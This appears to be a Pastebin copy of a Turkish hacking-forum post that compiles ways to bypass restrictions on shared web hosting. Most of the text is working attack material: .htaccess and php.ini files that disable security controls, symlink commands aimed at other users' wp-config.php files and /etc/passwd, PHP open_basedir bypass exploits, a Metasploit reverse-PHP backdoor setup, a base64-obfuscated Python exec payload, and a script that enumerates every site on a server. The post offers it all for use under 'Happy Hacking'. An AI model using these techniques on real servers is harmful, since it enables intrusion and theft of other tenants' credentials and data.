Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Konu Başlığı => Linux ve Windows Server [ Sunucu ] ByPass Symlink .htaccess .php.ini OVH Hosting LiteSpeed Server Restriction Bypass Vulnerability ile Atlatma Teknikleri [ 19.09.2017 ]
- Orjinal Konu Linki => Orjinal Konu Linki => https://www.cyberizm.org/cyberizm-tum-linux-win-server-bypass-symlink-htaccess-teknikleri.html
- Hazırlayan => KingSkrupellos - Cyberizm Digital Security Team
- Tüm Hepsini Okumadan Önce Mutlaka Okumanız Gereken Makale =>
- Sunucularda Güvenlik Modunu Devre Dışı Bırakma Detaylı Anlatım
- [hide][code]https://www.cyberizm.org/cyberizm-sunucularda-guvenlik-modunu-devre-disi-birakma-detayli-anlatim.html[/code][/hide]
- Konuyla ilgili BAZI Videolu Anlatımlar =>
- [video=youtube]https://www.youtube.com/watch?v=OU7gakFAEf0[/video]
- [video=youtube]https://www.youtube.com/watch?v=dQ1y1GSiobA[/video]
- [video=youtube]https://www.youtube.com/watch?v=5dkb8aHknYg[/video]
- [video=youtube]https://www.youtube.com/watch?v=y2V1VK7w77c[/video]
- [video=youtube]https://www.youtube.com/watch?v=CNMRkOY225I[/video]
- [video=youtube]https://www.youtube.com/watch?v=nNVk5AxKsIE[/video]
- [video=youtube]https://www.youtube.com/watch?v=drcru-MI2sI[/video]
- [video=youtube]https://www.youtube.com/watch?v=-DIasGdWimM[/video]
- [video=youtube]https://www.youtube.com/watch?v=0POx2Gsrrxs[/video]
- [video=youtube]https://www.youtube.com/watch?v=1kggQCF79DE[/video]
- İçindekiler =>
- 1) - [ Bypass Directory ]-
- 2) Bypass Symlink with .htaccess
- 3) LiteSpeed Bypass [SymLink]
- 4) Litespeed Symlink 403 Forbidden Bypass
- 5) - [ Include symlink ]-
- 6) - [ Bypass Litespeed ] -
- 7) - [ ByPass OVH Hosting ]-
- 8) - [ Bypass Symlink 403 forbidden ] -
- 9) Bypass symlink via .htaccess 2016
- 10 ) ByPass Passwd in LiteSpeed Genel Mantık
- 11 ) Bypass Symlink (Priv8) Code
- 12 ) PHP 'symlink()' 'open_basedir' Restriction Bypass Vulnerability / PHP 5.2.12/5.3.1 symlink open_basedir bypass
- 13 ) Server Bypass OVH & BlueHost Symlink Code 2014
- 14 ) Symlink Bypass 404
- 15) Internal Server Error ByPass Hatası ve Çözümü Kodu
- 16) Metasploit Bypass Backconnect & Get Domainowners
- 17 ) Server Bypass read and edit file with python script Work On (Linux,Win)
- __________________________________________
- - [ Bypass Directory ]-
- [code]<Directory "/home/user/public_html">
- Options -ExecCGI
- AllowOverride AuthConfig Indexes Limit FileInfo options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks
- </Directory>[/code]
- Bypass Symlink with .htaccess
- [code]
- OPTIONS Indexes Includes ExecCGI FollowSymLinks
- AddHandler txt .php
- AddHandler cgi-script .pl
- AddHandler cgi-script .pl
- OPTIONS Indexes Includes ExecCGI FollowSymLinks
- Options Indexes FollowSymLinks
- AddType txt .php
- AddType text/html .shtml
- Options All
- Options All[/code]
- LiteSpeed Bypass [SymLink]
- [code]
- python shell , CGI PERL Shell
- and .htaccess
- the htaccess code is
- Options Indexes FollowSymLinks
- DirectoryIndex ssssss.htm
- AddType txt .php
- AddHandler txt .php
- <IfModule mod_autoindex.c>
- IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
- </ifModule>
- <IfModule mod_security.c>
- SecFilterEngine Off
- SecFilterScanPOST Off
- </IfModule>
- Options +FollowSymLinks
- DirectoryIndex Sux.html
- Options +Indexes
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- ===============
- what we should do ?
- just open the cgi bypass shell
- and do sym
- ln -s /home/user/public_html/wp-config.php 1.txt
- then
- cat 1.txt[/code]
- Litespeed Symlink 403 Forbidden Bypass
- [code]
- Options all
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any
- DirectoryIndex new
- DirectoryIndex config.ini[/code]
- - [ Include symlink ]-
- [code]
- Options Indexes FollowSymLinks
- DirectoryIndex ssssss.htm
- AddType txt .php
- AddHandler txt .php[/code]
- - [ Bypass Litespeed ] -
- [code]
- wew.shtml
- do ==> ln -ls /home/user/public_html/configuration.php wew.shtml
- .htaccess
- Options +FollowSymLinks
- DirectoryIndex chesss.html
- RemoveHandler .php
- AddType application/octet-stream .php[/code]
- - [ Bypass OVH ]-
- [code]
- .htaccess
- Options +FollowSymLinks
- DirectoryIndex Index.html
- Options +Indexes
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType root .root
- AddHandler cgi-script .root
- AddHandler cgi-script .root
- php.ini
- safe_mode = Off
- disable_functions =
- safe_mode_gid = Off
- open_basedir = Off
- register_globals = on
- exec = On
- shell_exec = On
- ln -s / CoderSec[/code]
- - [ Bypass Symlink 403 forbidden ] -
- [code]
- .htaccess
- Options all
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any[/code]
- Bypass symlink via .htaccess 2016
- [code]
- OPTIONS Indexes Includes ExecCGI FollowSymLinks
- AddHandler txt .php
- AddHandler cgi-script .cgi
- AddHandler cgi-script .pl
- OPTIONS Indexes Includes ExecCGI FollowSymLinks
- Options Indexes FollowSymLinks
- AddType txt .php
- AddType text/html .shtml
- Options All
- Options All[/code]
- ByPass Passwd in LiteSpeed Genel Mantık
- [code]
- A good way to bypass forbidden error when reading passwd file
- The general approach:
- ln -s / etc / passwd passwd.txt
- Well, open the passwd file The forbidden error encountered
- for bypass=>
- To bypass coming from one of the following two commands are used:
- Code: (Select All)
- ln -s /etc/passwd README
- ln -s /etc/passwd HEADER
- The second command will run in a directory And when we go back to the directory where the file will be shown passwd us.
- SPT to b0x
- Bypass Symlink (Priv8)
- How you can bypass Symlink in linux webserver ?
- 1/ Create a folder
- 2/ Upload inside
- ".htaccess"
- CODE:
- Options all
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any
- 3/ Bypass manually
- ln -s /home/user/public_html/t0ph4cking.txt
- Bypass Symlink 403 Forbidden with .htaccess
- Options all
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any[/code]
- Simple Bypass Internal Server Error Symlink 2016
- [code]
- Options Indexes FollowSymLinks
- DirectoryIndex linuxsec.htm
- AddType txt .php
- AddHandler txt .php[/code]
- PHP 'symlink()' 'open_basedir' Restriction Bypass Vulnerability / PHP 5.2.12/5.3.1 symlink open_basedir bypass
- [code]
- <?php
- /*
- PHP 5.2.11/5.3.0 symlink() open_basedir bypass
- by KingSkrupellos - Cyberizm Digital Security Team
- CHUJWAMWMUZG
- */
- $fakedir="cx";
- $fakedep=16;
- $num=0; // offset of symlink.$num
- if(!empty($_GET['file'])) $file=$_GET['file'];
- else if(!empty($_POST['file'])) $file=$_POST['file'];
- else $file="";
- echo '<PRE><img
- src="http://www.cyberizm.org/"><P>This is exploit
- from <a
- href="http://securityreason.com/" title="Cyberizm PHP">Cyberizm
- Lab - SecurityReason</a> labs.
- Author : KingSkrupellos
- <p>Script for legal use only.
- <p>PHP 5.2.11 5.3.0 symlink open_basedir bypass
- <p>More: <a href="http://cyberizm.org/">Cyberizm</a>
- <p><form name="form"
- action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF
- "]).'" method="post"><input type="text" name="file" size="50"
- value="'.htmlspecialchars($file).'"><input type="submit" name="hym"
- value="Create Symlink"></form>';
- if(empty($file))
- exit;
- if(!is_writable("."))
- die("not writable directory");
- $level=0;
- for($as=0;$as<$fakedep;$as++){
- if(!file_exists($fakedir))
- mkdir($fakedir);
- chdir($fakedir);
- }
- while(1<$as--) chdir("..");
- $hardstyle = explode("/", $file);
- for($a=0;$a<count($hardstyle);$a++){
- if(!empty($hardstyle[$a])){
- if(!file_exists($hardstyle[$a]))
- mkdir($hardstyle[$a]);
- chdir($hardstyle[$a]);
- $as++;
- }
- }
- $as++;
- while($as--)
- chdir("..");
- @rmdir("fakesymlink");
- @unlink("fakesymlink");
- @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
- // this loop will skip allready created symlinks.
- while(1)
- if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file,
- "symlink".$num))) break;
- else $num++;
- @unlink("fakesymlink");
- mkdir("fakesymlink");
- die('<FONT COLOR="RED">check symlink <a
- href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');
- ?>
- PHP Symbolic Link Open_Basedir Bypass Vulnerability
- script1.php
- <?
- symlink("a/a/a/a/a/a/", "dummy");
- symlink("dummy/../../../../../../etc/passwd", "xxx");
- unlink("dummy");
- while (1) {
- symlink(".", "dummy");
- unlink("dummy");
- }
- ?>
- script2.php
- <?
- while (1) {
- print @file_get_contents("xxx");
- }
- ?>[/code]
- Symlink Bypass 404
- [code]
- <? /*KingSkrupellos Symlink Bypass 404*/ @error_reporting(0);@ini_set('display_errors', 0); echo '<title>Cyberizm SYM404</title><body bgcolor=silver><center><form method="post"><br>File Target : <input name="fl" value="/home/user/public_html/configuration.php"> <input name="anu" type="submit" value="SYM"></form><br>';if($_POST['anu']){
- rmdir("sl");mkdir("sl", 0777);$fl = $_POST['fl'];system("ln -s ".$fl." sl/x.txt");symlink($fl,"sl/x.txt");$anu = fopen("sl/.htaccess", "w");
- fwrite($anu,"ReadmeName x.txt");
- echo'<a href=sl/x.txt>CHECK</a>';
- }[/code]
- Server Bypass OVH & BlueHost Symlink Code 2014
- [code]
- ".htaccess":
- #Bypass By Cyberizm.Org
- <DIRECTORY /..../user/..../>
- OPTIONS Indexes ExecCGI FollowSymLinks
- AllowOverride All
- </DIRECTORY>
- AddType txt .php
- AddHandler txt .php
- "php.ini":
- #Bypass By Cyberizm.Org
- safe_mode = OFF
- disable_functions = NONE
- safe_mode_gid = OFF
- open_basedir = OFF
- register_globals = ON
- exec = ON
- shell_exec = ON[/code]
- Internal Server Error ByPass Hatası ve Çözümü Kodu
- [code]
- Bazen serverde cgi telnet shell derken internal server error diye gıcık bir hata alırsınız bunun çözüm yolu çok olmakla birlikte en garanti çözüm yolu cpanel girip MiME types bölümüne gelip ilk satıra
- application/x-httpd-cgi
- yı yazmak daha sonra ikinci satıra cgi shelinizin uzantısını yazmak mesela ali.veli şeklindeyse cgi sheliniz ikinci satıra veli yazıp okeylemek sonra broswere grip o cgi shelein olduğu adresi yenilemek tabi bu arada bu yenileme işlemini yapmadan önce ali.veli şeklindeki cgi shelimize chmod 755 vermeyi unutmayacaz
- Öncelikle Serverimize CGI atmadan once Perl Kodlarımızı Açıyoruz Ve en başta olan
- #!/usr/bin/perl -I/usr/local/bandmain yazıyoruz ve Serverimize upload ediyoruz.
- Eğerki serverde tekrar hata oluyorsaniz Web Shell CGİ Denemenizi isterim
- http://archive.is/UT8xf Buyrun burada
- .htaccess code :
- Options +FollowSymLinks
- DirectoryIndex seees.html
- Options +Indexes
- Options +ExecCGI
- AddHandler cgi-script cgi pl wasRewriteEngine on
- RewriteRule (.*)\.was$ $1.was[/code]
- Metasploit Bypass Backconnect & Get Domainowners
- [code]
- ////////////////////SET UP BACKDOOR////////////////////
- use payload/php/reverse_php
- set LHOST [You Wan Ip] set LPORT 22
- set ENCODER php/base64
- generate -t raw
- ////////////////SET UP LISTENING/////////////////
- use exploit/multi/handler
- set LHOST [You Lan IP] set LPORT 22
- set payload php/reverse_php
- exploit
- /////////////////// RUN BACKDOOR////////////////
- php /home/yfnvpnvb/domains/quangcaonewstar.com/public_html/test.php
- //////////////////CAT /ETC/PASSWD//////////////
- cat /etc/passwd > passwd.txt
- ///////////////////CAT USER-DOMAIN/////////////
- cat /etc/virtual/domainowners > domain.txt[/code]
- ____________________
- [code]
- #!/usr/bin/python
- #-------------------------------------------------------------------------------
- # Author: KingSkrupellos
- # WebSite Cyberizm.Org
- #-------------------------------------------------------------------------------
- import base64;
- exec(base64.b64decode('cHJpbnQgIiNvbWFucm9vdCINCnByaW50ICIjb20tcm9vdEBob3RtYWlsLmNvbSINCnByaW50ICIjR3JlZXRzICwgQWxsIE9tYW5pIEFuZCBNdXNsaW0gR3JheWhhdCINCnB1dCA9IHJhd19pbnB1dCgiRW50ZXIgdGhlIGZpbGUgeW91IHdhbnQgdG8gYnJvd3NlIGl0IDogIikgIyBIZXJlIHRoZSBVc2VyIEVudGVyIGhpcyBmaWxlIHdhbnQgdG8gcHJvY2Nlc3MgaXQuDQp3b3JyID0gcmF3X2lucHV0KCJOb3RpY2UgLCAgdGhlIG1vZGVzIHdpbGwgZXhlY3V0ZSBpcyB3cml0ZT13IHJlYWQ9ciAsLCBmb3IgY29udGludWF0aW9uIHByZXNzIDxFbnRlcj4gOiIpICNoZXJlIHRoZSB1c2VyIGlmIGFjY2VwdCB0byB0aGUgZmlsZS4NCmlmIHdvcnIgPT0gJ3InIG9yICdyZWFkJyA6ICNoZXJlIHByb2Nlc3Mgb2YgcmVhZGluZw0KICAgIHJlYWQgPSBvcGVuKHB1dCwncicpDQogICAgZGF0YSA9IHJlYWQucmVhZCgpDQogICAgcHJpbnQgZGF0YQ0KaWYgd29yciA9PSAndycgb3IgJ3dyaXRlJzogI2hlcmUgcHJvY2VzcyBvZiB3cml0ZQ0KICAgIHdyaXRlID0gb3BlbihwdXQsJ3cnKQ0KICAgIHR4dCA9IHJhd19pbnB1dCgiRW50ZXIgdGhlIHRleHQgeW91IHdhbnQgdG8gYWRkIHRvIHRoZSBmaWxlIE5vdGljZShBTEwgZGF0YSBvbiB0aGlzIGZpbGUgeW91IHdpbGwgbG9zdCBpdCBcImlmIHlvdSBkb24ndCB3YW50IHBsZWFzZSBwcmVzcyBcJ0NUUkwrQ1wnIFwiKSA6IikNCiAgICB3cml0ZS53cml0ZSh0eHQpDQogICAgcHJpbnQgImNoZWNrIHlvdXIgZmlsZSAsIGlmIGl0IHdhcyBkb25lIC4iDQplbHNlOg0KICAgIHByaW50ICJFcnJvciINCiAgICBleGl0KCkNCg0KI0RvbmUgQnkgT21hbnJvb3Q='))[/code]
- Symlink 404 Not Found Script
- [code]
- #!/usr/bin/env python
- #Symlink Script by KingSkrupellos
- #Creates Symlinks and makes a neat PHP index of sites in the dir "kidsymx"
- #Version 1.1
- #Minor fixes
- #
- #contact me @ Cyberizm Digital Security Team
- #Cyberizm
- import os,sys,re
- if not os.path.exists('kidsymx'):
- os.makedirs('kidsymx')
- os.chdir('kidsymx')
- hta='Options Indexes FollowSymLinks\nDirectoryIndex kSym.php\nAddType txt .php\nAddHandler txt .php\n'
- x=open('.htaccess','w')
- x.write(hta)
- x.close()
- print '[+] htaccess created'
- h="<html><head><title>kidSym</title><style>table,tr,td{padding: 7px 10px 7px 10px ; border: 1px solid black;} .menf{font-color:lime; font-size:11px; font-weight:bold;}</style></head><body bgcolor=#98FF98><center>
- <h1>
- kidSym</h1>
- <p class=menf>
- KingSkrupellos
- greetz:Cyberizm Digital Security Team</p>
- <table >"
- os.system("ln -s / kid.txt")
- if os.path.exists('kid.txt'):
- print "[+] Symlink Created"
- else:
- print "[-] Unable to Create Symlink"
- usrs=[]
- sitesx=[]
- z=open("/etc/passwd","r")
- z=z.read()
- z=re.findall('/home\w*?/\w+',z)
- for usr in z:
- usrs.append(usr)
- sites=os.listdir("/var/named/")
- for site in sites:
- site=site.replace(".db","")
- sitesx.append(site)
- #php making
- path=os.getcwd()
- if "/public_html/" in path:
- path="/public_html/"
- else:
- path="/html/"
- counter=1
- indx=open("kSym.php","w")
- indx.write(h)
- for userx in usrs:
- for sitex in sitesx:
- u=userx.split("/",2)[2][0:5]
- s=sitex[0:5]
- if u==s:
- indx.write("
- <tr><td style=font-family:calibri;font-weight:bold;color:grey;>%s</td><td style=font-family:calibri;font-weight:bold;color:red;>%s</td><td style=font-family:calibri;font-weight:bold;><a href="kid.txt%s%s" target="_blank">%s</a></td>"%(counter,userx.split("/",3)[2],userx,path,sitex))
- counter=counter+1
- print "[+] Site index Complete"
- print "[*] %s Sites found" %str(counter)
- print "[+] Happy Hacking ./KingSkrupellos Cyberizm Digital Security Team"[/code]
- İşlem Bu Kadar. Happy Hacking. Mr. KingSkrupellos Cyberizm Digital Security Team
Add Comment
Please, Sign In to add comment